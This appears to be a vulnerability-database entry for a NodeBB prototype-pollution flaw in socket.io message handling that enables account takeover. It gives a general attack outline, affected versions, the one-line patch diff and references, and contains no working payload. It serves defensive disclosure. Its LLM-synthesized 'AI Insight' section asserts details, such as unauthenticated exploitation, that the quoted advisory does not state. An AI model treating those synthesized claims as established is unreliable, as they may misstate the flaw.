Account takeover via prototype vulnerability
Description
NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit 48d143921753914da45926cca6370a92ed0c46b8 into their codebase to patch the exploit.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
NodeBB prior to 2.6.1 allows account takeover via prototype pollution in socket.io message handling.
Vulnerability
Overview
NodeBB, an open-source Node.js forum software, is vulnerable to a prototype pollution vulnerability due to the use of a plain object with a prototype in its socket.io message handling [1]. This flaw allows an attacker to craft a specially payload that, when processed by the socket.io onMessage handler, can modify the Object prototype and inject malicious properties [3].
Exploitation
Path
The vulnerability is triggered by sending a crafted socket.io message to the server. No authentication is required to exploit the bug; an unauthenticated remote attacker can send the malicious payload because socket.io events are processed before any authentication checks [2]. The attack surface is the real-time messaging feature, which uses socket.io for instant interactions [2].
Impact
Successful exploitation enables an attacker to impersonate other users and completely takeover their accounts [1]. By manipulating the prototype, the attacker can override user identity properties, gaining full access to the victim's account, including private messages, personal settings, and any administrative privileges the victim may have.
Mitigation
The vulnerability has been patched in NodeBB version 2.6.1 [4]. Users should upgrade immediately. Those unable to upgrade immediately can cherry-pick commit 48d143921753914da45926cca6370a92ed0c46b8 from the NodeBB repository to apply the fix [1].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
nodebbnpm | < 2.6.1 | 2.6.1 |
Affected products
2- NodeBB/NodeBBv5Range: < 2.6.1
Patches
148d143921753fix: prototype vulnerability in socket.io onMessage
1 file changed · +1 −1
src/socket.io/index.js+1 −1 modified@@ -13,7 +13,7 @@ const logger = require('../logger'); const plugins = require('../plugins'); const ratelimit = require('../middleware/ratelimit'); -const Namespaces = {}; +const Namespaces = Object.create(null); const Sockets = module.exports;
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-rf3g-v8p5-p675ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-46164ghsaADVISORY
- github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8ghsax_refsource_MISCWEB
- github.com/NodeBB/NodeBB/releases/tag/v2.6.1ghsaWEB
- github.com/NodeBB/NodeBB/security/advisories/GHSA-rf3g-v8p5-p675ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.